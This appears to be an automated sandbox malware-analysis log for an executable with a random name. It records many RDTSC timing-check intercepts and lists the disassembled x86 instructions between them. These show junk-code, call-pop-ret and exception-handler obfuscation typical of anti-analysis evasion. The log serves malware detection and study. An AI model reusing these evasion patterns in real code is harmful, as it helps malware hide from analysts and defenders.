Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB2633 second address: DB2639 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB2639 second address: DB2669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA790B33260h 0x00000008 jmp 00007FA790B33261h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB2923 second address: DB293F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA7911D2C8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB293F second address: DB2943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB31B3 second address: DB31EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007FA7911D2C86h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FA7911D2C88h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov di, F6E4h 0x0000002b nop 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jnl 00007FA7911D2C86h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB31EC second address: DB31F2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB333D second address: DB3342 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB36EE second address: DB36F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB36F3 second address: DB3721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA7911D2C8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b js 00007FA7911D2C8Ch 0x00000011 jp 00007FA7911D2C86h 0x00000017 pop ecx 0x00000018 nop 0x00000019 or dword ptr [ebp+122D3276h], ecx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB3721 second address: DB3725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB3725 second address: DB372B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB372B second address: DB3735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA790B33256h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB468E second address: DB470F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA7911D2C95h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jbe 00007FA7911D2C86h 0x00000015 jbe 00007FA7911D2C86h 0x0000001b popad 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f jmp 00007FA7911D2C99h 0x00000024 popad 0x00000025 popad 0x00000026 nop 0x00000027 movsx edi, bx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007FA7911D2C88h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 push 00000000h 0x00000048 push eax 0x00000049 push edi 0x0000004a push eax 0x0000004b push edx 0x0000004c jnc 00007FA7911D2C86h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB5715 second address: DB5719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB5719 second address: DB571D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB571D second address: DB5723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB5723 second address: DB5790 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA7911D2C94h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c cld 0x0000000d popad 0x0000000e mov esi, ebx 0x00000010 push 00000000h 0x00000012 sub esi, dword ptr [ebp+122D1978h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FA7911D2C88h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 js 00007FA7911D2C89h 0x0000003a mov di, dx 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 jns 00007FA7911D2C86h 0x00000047 jmp 00007FA7911D2C91h 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB616E second address: DB6175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB8062 second address: DB8066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB8066 second address: DB80CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 je 00007FA790B33262h 0x0000000e je 00007FA790B3325Ch 0x00000014 jno 00007FA790B33256h 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007FA790B33258h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov dword ptr [ebp+122D310Dh], edi 0x0000003b jmp 00007FA790B3325Ah 0x00000040 push 00000000h 0x00000042 mov edi, dword ptr [ebp+122D3814h] 0x00000048 push 00000000h 0x0000004a jne 00007FA790B3325Ah 0x00000050 push eax 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 pop eax 0x00000056 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB747E second address: DB7482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB7482 second address: DB7488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB7488 second address: DB748D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB8B39 second address: DB8B3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB748D second address: DB74A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA7911D2C86h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jc 00007FA7911D2CA1h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB74A5 second address: DB74A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB8B3E second address: DB8BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, 78FA8A04h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FA7911D2C88h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b add dword ptr [ebp+122D2E77h], ecx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007FA7911D2C88h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d jo 00007FA7911D2C8Bh 0x00000053 adc di, 2FA4h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b jns 00007FA7911D2C91h 0x00000061 jmp 00007FA7911D2C8Bh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBD27A second address: DBD27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBD27E second address: DBD282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBD282 second address: DBD312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FA790B3325Bh 0x00000011 nop 0x00000012 mov edi, dword ptr [ebp+122D345Fh] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FA790B33258h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 movsx ebx, si 0x00000037 mov edi, 1DA8943Eh 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push esi 0x00000041 call 00007FA790B33258h 0x00000046 pop esi 0x00000047 mov dword ptr [esp+04h], esi 0x0000004b add dword ptr [esp+04h], 00000019h 0x00000053 inc esi 0x00000054 push esi 0x00000055 ret 0x00000056 pop esi 0x00000057 ret 0x00000058 jmp 00007FA790B33265h 0x0000005d push eax 0x0000005e js 00007FA790B33277h 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBF3A9 second address: DBF3D2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA7911D2C9Bh 0x00000008 jmp 00007FA7911D2C95h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007FA7911D2C86h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBE456 second address: DBE45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBF3D2 second address: DBF473 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D2AA4h], ecx 0x0000000e mov dword ptr [ebp+124695EBh], eax 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FA7911D2C88h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 jmp 00007FA7911D2C98h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FA7911D2C88h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 push ecx 0x00000052 call 00007FA7911D2C8Fh 0x00000057 mov dword ptr [ebp+122D185Bh], ebx 0x0000005d pop ebx 0x0000005e pop edi 0x0000005f push eax 0x00000060 pushad 0x00000061 push edi 0x00000062 pushad 0x00000063 popad 0x00000064 pop edi 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FA7911D2C93h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBE45A second address: DBE45E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBF5EF second address: DBF66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 nop 0x00000007 jnl 00007FA7911D2C8Ch 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov dword ptr [ebp+122D32D6h], ecx 0x0000001a mov bx, 28B6h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 jp 00007FA7911D2C89h 0x0000002b mov bx, si 0x0000002e mov eax, dword ptr [ebp+122D0D01h] 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007FA7911D2C88h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000017h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e sub dword ptr [ebp+122D327Ch], edi 0x00000054 push FFFFFFFFh 0x00000056 mov di, dx 0x00000059 nop 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FA7911D2C96h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBF66C second address: DBF683 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA790B3325Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBF683 second address: DBF687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBF687 second address: DBF68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC1651 second address: DC1657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC1657 second address: DC1705 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA790B3325Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c xor edi, 682E918Dh 0x00000012 push dword ptr fs:[00000000h] 0x00000019 jmp 00007FA790B33267h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 mov dword ptr [ebp+122D34A2h], eax 0x0000002b mov eax, dword ptr [ebp+122D0561h] 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FA790B33258h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b mov bl, DEh 0x0000004d mov edi, dword ptr [ebp+124711D5h] 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007FA790B33258h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 0000001Ch 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f mov bx, si 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 jmp 00007FA790B3325Ch 0x0000007b jnp 00007FA790B33256h 0x00000081 popad 0x00000082 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC32CD second address: DC32D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FA7911D2C86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC3373 second address: DC3379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC359A second address: DC35A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC35A0 second address: DC35A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC43CC second address: DC43D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC43D2 second address: DC43D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC43D6 second address: DC43DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC43DA second address: DC4440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push esi 0x0000000c jmp 00007FA790B33262h 0x00000011 pop ebx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 cmc 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 or ebx, dword ptr [ebp+122D35D0h] 0x00000027 mov eax, dword ptr [ebp+122D059Dh] 0x0000002d call 00007FA790B3325Fh 0x00000032 pushad 0x00000033 mov ebx, dword ptr [ebp+1244601Ch] 0x00000039 sub edi, dword ptr [ebp+122D3550h] 0x0000003f popad 0x00000040 pop ebx 0x00000041 push FFFFFFFFh 0x00000043 sub edi, dword ptr [ebp+122D3594h] 0x00000049 push eax 0x0000004a push ecx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC62AF second address: DC62B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC62B3 second address: DC6322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FA790B33258h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov ebx, esi 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007FA790B33258h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 00000014h 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D3393h], ebx 0x00000045 mov edi, 1AF16E46h 0x0000004a push 00000000h 0x0000004c jnc 00007FA790B33256h 0x00000052 xchg eax, esi 0x00000053 push edx 0x00000054 jbe 00007FA790B33258h 0x0000005a pushad 0x0000005b popad 0x0000005c pop edx 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 jno 00007FA790B33256h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC6322 second address: DC6337 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA7911D2C91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC4440 second address: DC4444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC73DE second address: DC7452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FA7911D2C88h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007FA7911D2C88h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 00000014h 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f jmp 00007FA7911D2C8Ah 0x00000044 jo 00007FA7911D2C8Ch 0x0000004a sub dword ptr [ebp+122D34E4h], esi 0x00000050 push 00000000h 0x00000052 mov bx, 0D11h 0x00000056 movsx edi, di 0x00000059 push eax 0x0000005a jo 00007FA7911D2CA0h 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC8364 second address: DC836A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC836A second address: DC839C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA7911D2C96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, ecx 0x0000000e push 00000000h 0x00000010 mov bx, ax 0x00000013 push 00000000h 0x00000015 mov ebx, dword ptr [ebp+122D5494h] 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC839C second address: DC83A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC650A second address: DC650E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC650E second address: DC6514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC7585 second address: DC7630 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov ebx, 321F7E33h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FA7911D2C88h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 jo 00007FA7911D2C89h 0x0000003a mov di, dx 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 jnc 00007FA7911D2C88h 0x0000004a mov dword ptr [ebp+122D1B69h], ebx 0x00000050 mov eax, dword ptr [ebp+122D14D5h] 0x00000056 jmp 00007FA7911D2C99h 0x0000005b push FFFFFFFFh 0x0000005d push 00000000h 0x0000005f push esi 0x00000060 call 00007FA7911D2C88h 0x00000065 pop esi 0x00000066 mov dword ptr [esp+04h], esi 0x0000006a add dword ptr [esp+04h], 0000001Dh 0x00000072 inc esi 0x00000073 push esi 0x00000074 ret 0x00000075 pop esi 0x00000076 ret 0x00000077 nop 0x00000078 push edx 0x00000079 je 00007FA7911D2C8Ch 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC6514 second address: DC6519 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC9334 second address: DC9338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
